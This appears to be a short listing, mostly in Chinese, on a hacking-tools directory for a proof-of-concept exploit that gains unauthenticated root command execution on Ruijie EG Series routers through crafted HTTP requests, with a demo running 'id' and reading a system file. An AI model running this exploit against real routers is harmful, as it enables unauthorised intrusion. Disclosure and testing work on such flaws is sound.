黑客、渗透测试和网络安全工具,武装您的安全武器库!
Proof-of-concept exploit for unauthenticated remote code execution in Ruijie EG Series routers (firmware <=EG_3.0(1)B11P216). Executes arbitrary commands via crafted HTTP requests.
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
锐捷EG系列路由器固件版本<=EG_3.0(1)B11P216由于过滤不当,允许未经身份验证的攻击者远程执行任意代码。
$ python3 poc.py 192.168.1.1 'id' uid=0(root) gid=0(root) $ python3 poc.py 192.168.1.1 'grep TARGET /etc/openwrt_release' DISTRIB_TARGET='mediatek/eg310gh-e'
演示